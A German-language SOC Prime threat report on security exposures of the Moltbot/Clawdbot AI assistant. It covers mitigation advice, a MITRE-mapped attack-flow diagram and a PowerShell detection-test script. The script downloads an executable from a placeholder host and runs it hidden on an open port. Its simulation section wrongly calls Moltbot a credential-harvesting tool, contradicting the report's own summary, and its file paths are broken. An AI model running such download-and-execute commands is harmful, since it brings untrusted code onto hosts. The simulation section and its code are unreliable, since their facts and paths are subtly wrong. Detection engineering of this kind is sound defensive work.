SOC Prime Bias: Kritisch

28 Jan. 2026 13:13
newspaper icon TheRegister

Die Moltbot / ClawdBots-Epidemie

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Folgen
Die Moltbot / ClawdBots-Epidemie
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Zusammenfassung

Der Artikel weist auf Sicherheitsprobleme rund um den KI-Persönlichen Assistenten hin, der zuerst als Clawdbot gebrandmarkt und später in Moltbot umbenannt wurde. Moltbot wird über Messaging-Apps wie WhatsApp und Telegram betrieben, doch viele Einsätze sind mit schwacher oder fehlender Authentifizierung aus dem Internet erreichbar. Es schreibt Benutzeranmeldeinformationen in Klartextdateien, und seine Skill-Bibliothek kann vergiftet werden, was eine Lieferkettenexposition schafft. Bedrohungsakteure könnten Geheimnisse stehlen, Quellcode exfiltrieren und den Assistenten als Hintertür umfunktionieren.

Untersuchung

Forscher fanden Hunderte von Moltbot-Instanzen, die nicht authentifizierte Admin-Ports und unsichere Proxy-Konfigurationen exponierten. Ein Proof-of-Concept-Lieferkettenangriff lud eine bösartige Fähigkeit in die ClawdHub-Bibliothek hoch, was die Ausführung von Fernbefehlen für nachgelagerte Benutzer demonstrierte. Analysten beobachteten auch, dass Geheimnisse in Klartext-Markdown- und JSON-Dateien bestehen bleiben, was sie zu einer leichten Beute für Commodity-Infostealer wie RedLine, Lumma und Vidar macht.

Minderung

Betreiber sollten für alle Moltbot-Dienste eine starke Authentifizierung verlangen, Admin-Ports schließen oder durch eine Firewall absichern und den Assistenten nicht dem Internet aussetzen. Aktivieren Sie Verschlüsselung im Ruhezustand für gespeicherte Geheimnisse, nutzen Sie Sandbox- oder Containerlösungen für die Laufzeit und beschränken Sie den Dateisystemzugriff. Überprüfen, signieren und fixieren Sie alle Fähigkeiten, die aus der Bibliothek geladen werden, und ziehen Sie in Betracht, die Skill-Funktion zu deaktivieren, wenn sie nicht sicher verwaltet werden kann.

Reaktion

Alarmieren Sie bei offenen Admin-Ports und nicht authentifizierten Zugriffsversuchen auf Moltbot. Überwachen Sie den KI-Prozess auf unerwartete Befehlsausführung und ausgehende Verbindungen zu unbekannten C2-Domains. Scannen Sie Hosts auf Anmeldeinformationsdiebstahl-Malware und überprüfen Sie die Integrität von gespeicherten Konfigurationsdateien. Wenn ein Kompromiss bestätigt wird, isolieren Sie das System, widerrufen Sie exponierte Anmeldeinformationen und setzen Sie Moltbot mit gehärteten Einstellungen neu ein.

%% Class Definitions classDef technique fill:#ffcc99 classDef actor fill:#99ff99 classDef asset fill:#ccccff classDef process fill:#ff9999 %% Nodes actor_attacker[„<b>Akteur</b>: Angreifer“] class actor_attacker actor asset_moltbot[„<b>Asset</b>: Moltbot-Instanz<br/><b>Exposition</b>: Unauthentifizierter Admin-Port öffentlich zugänglich“] class asset_moltbot asset tech_external_remote[„<b>Technik</b> – T1133: Externe Remote-Dienste<br/><b>Beschreibung</b>: Nutzung öffentlich exponierter Remote-Dienste zur Erlangung des Erstzugangs“] class tech_external_remote technique tech_exploit_remote[„<b>Technik</b> – T1210: Ausnutzung von Remote-Diensten<br/><b>Beschreibung</b>: Ausnutzung von Schwachstellen oder Fehlkonfigurationen in Remote-Diensten zur Befehlsausführung“] class tech_exploit_remote technique tech_remote_access[„<b>Technik</b> – T1219: Remote-Zugriffswerkzeuge<br/><b>Beschreibung</b>: Nutzung von Fernzugriffsfunktionen zur Ausführung weiterer Befehle auf kompromittierten Hosts“] class tech_remote_access technique tech_hijack_execution[„<b>Technik</b> – T1574: Hijacking des Ausführungsflusses<br/><b>Beschreibung</b>: Manipulation des Ausführungsflusses durch Vergiftung vertrauenswürdiger Komponenten wie einer Skill-Bibliothek“] class tech_hijack_execution technique asset_malicious_skill[„<b>Asset</b>: Bösartiger Skill<br/><b>Ort</b>: ClawHub Skill-Bibliothek“] class asset_malicious_skill asset tech_content_injection[„<b>Technik</b> – T1659: Content-Injektion<br/><b>Beschreibung</b>: Einschleusen von Schadcode in legitime Inhalte, die anschließend von Opfern ausgeführt werden“] class tech_content_injection technique process_payload[„<b>Prozess</b>: Bösartiger Payload<br/><b>Aktion</b>: Wird auf Moltbot-Hosts der Opfer ausgeführt“] class process_payload process tech_credentials_files[„<b>Technik</b> – T1552.001: Zugangsdaten in Dateien<br/><b>Beschreibung</b>: Zugriff auf im Klartext gespeicherte Zugangsdaten in Dateien wie JSON oder Markdown“] class tech_credentials_files technique tech_system_services[„<b>Technik</b> – T1569: Systemdienste<br/><b>Beschreibung</b>: Registrierung von Schadcode als Systemdienst zur Persistenz und Ausführung“] class tech_system_services technique asset_c2_server[„<b>Asset</b>: C2-Server des Angreifers<br/><b>Rolle</b>: Empfang von Ausführungsbestätigungen und exfiltrierten Zugangsdaten“] class asset_c2_server asset tech_exfiltration[„<b>Technik</b> – T1041: Exfiltration über C2-Kanal<br/><b>Beschreibung</b>: Übertragung gestohlener Daten an den Angreifer über den etablierten Command-and-Control-Kanal“] class tech_exfiltration technique %% Connections actor_attacker –>|entdeckt| asset_moltbot asset_moltbot –>|ermöglicht| tech_external_remote tech_external_remote –>|führt zu| tech_exploit_remote tech_exploit_remote –>|nutzt| tech_remote_access tech_remote_access –>|führt aus| tech_hijack_execution tech_hijack_execution –>|vergiftet| asset_malicious_skill asset_malicious_skill –>|injiziert Code in| tech_content_injection tech_content_injection –>|liefert an| process_payload process_payload –>|liest| tech_credentials_files tech_credentials_files –>|liefert Daten für| tech_system_services tech_system_services –>|erhält Persistenz und führt aus| process_payload process_payload –>|kontaktiert| asset_c2_server asset_c2_server –>|empfängt Daten über| tech_exfiltration

Angriffsablauf

Ausführung der Simulation

Voraussetzung: Der Telemetrie- & Basislinie-Pre-Flight-Check muss bestanden sein.

  • Angriffserzählung & Befehle:
    Das Red Team setzt Moltbot (ein öffentlich verfügbares Tool zur Ernte von Anmeldeinformationen) auf einem kompromittierten Windows-Host ein. Durch den Start von Moltbot mit der Standardkonfiguration wird eine nicht authentifizierte HTTP-Admin-Konsole auf Port 8080 geöffnet, die im Banner “dem Web ausgesetzt” bewirbt. Dies erzeugt Netzwerkverbindungsereignisse, die mit den wörtlichen Zeichenketten der Erkennungsregel übereinstimmen. Der Angreifer greift dann von einer externen IP-Adresse auf die Benutzeroberfläche zu, um die Exposition zu überprüfen und generiert so die erforderliche Telemetrie.

    1. Download Moltbot (simuliert durch einen Platzhalter-Zip).
    2. Extrahieren Sie und führen Sie die Binärdatei mit den Standardflags aus (--listen 0.0.0.0:8080).
    3. Eventuell ein HTTP GET von einer externen IP-Adresse ausführen (simuliert über Invoke-WebRequest).

  • Regressionstest-Skript:

    # ----------------------------------------------------
# Moltbot-Expositionssimulation – PowerShell
# ----------------------------------------------------
# 1. Erstellen Sie ein temporäres Verzeichnis
$tempDir = "$env:TEMPMoltbotSim"
New-Item -ItemType Directory -Force -Path $tempDir | Out-Null

# 2. Simulieren Sie das Herunterladen einer Moltbot-Ausführungsdatei (Platzhalter)
$molExe = "$tempDirmolbot.exe"
Invoke-WebRequest -Uri "https://example.com/moltbot.exe" -OutFile $molExe -UseBasicParsing

# 3. Führen Sie Moltbot mit den Standard (exponierten) Einstellungen aus
$proc = Start-Process -FilePath $molExe `
                      -ArgumentList "--listen 0.0.0.0:8080" `
                      -PassThru `
                      -WindowStyle Hidden

Write-Host "[+] Moltbot gestartet (PID: $($proc.Id)) hörend auf 0.0.0.0:8080"

# 4. Warten Sie eine kurze Weile, um den Dienst in den Logs zu registrieren
Start-Sleep -Seconds 5

# 5. Simulieren Sie eine externe Verbindung, um Netzwerkverkehr zu generieren
Try {
    Invoke-WebRequest -Uri "http://$($env:COMPUTERNAME):8080" -UseBasicParsing -TimeoutSec 5
    Write-Host "[+] Externe HTTP-Anfrage an die Moltbot-UI gesendet."
} Catch {
    Write-Warning "[-] Zugriff auf die Moltbot-UI nicht möglich (kann von der Firewall blockiert werden)."
}

# 6. Halten Sie den Prozess für zusätzliche Log-Erfassung am Leben (optional)
Start-Sleep -Seconds 20

# 7. Bereinigung – Moltbot stoppen
Stop-Process -Id $proc.Id -Force
Remove-Item -Recurse -Force $tempDir
Write-Host "[+] Moltbot-Simulation abgeschlossen und bereinigt."

  • Bereinigungskommandos:

    # Beenden Sie alle verbliebenen Moltbot-Prozesse und löschen Sie temporäre Dateien
Get-Process -Name "molbot" -ErrorAction SilentlyContinue | Stop-Process -Force
Remove-Item -Path "$env:TEMPMoltbotSim" -Recurse -Force -ErrorAction SilentlyContinue
Write-Host "Bereinigung abgeschlossen."

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten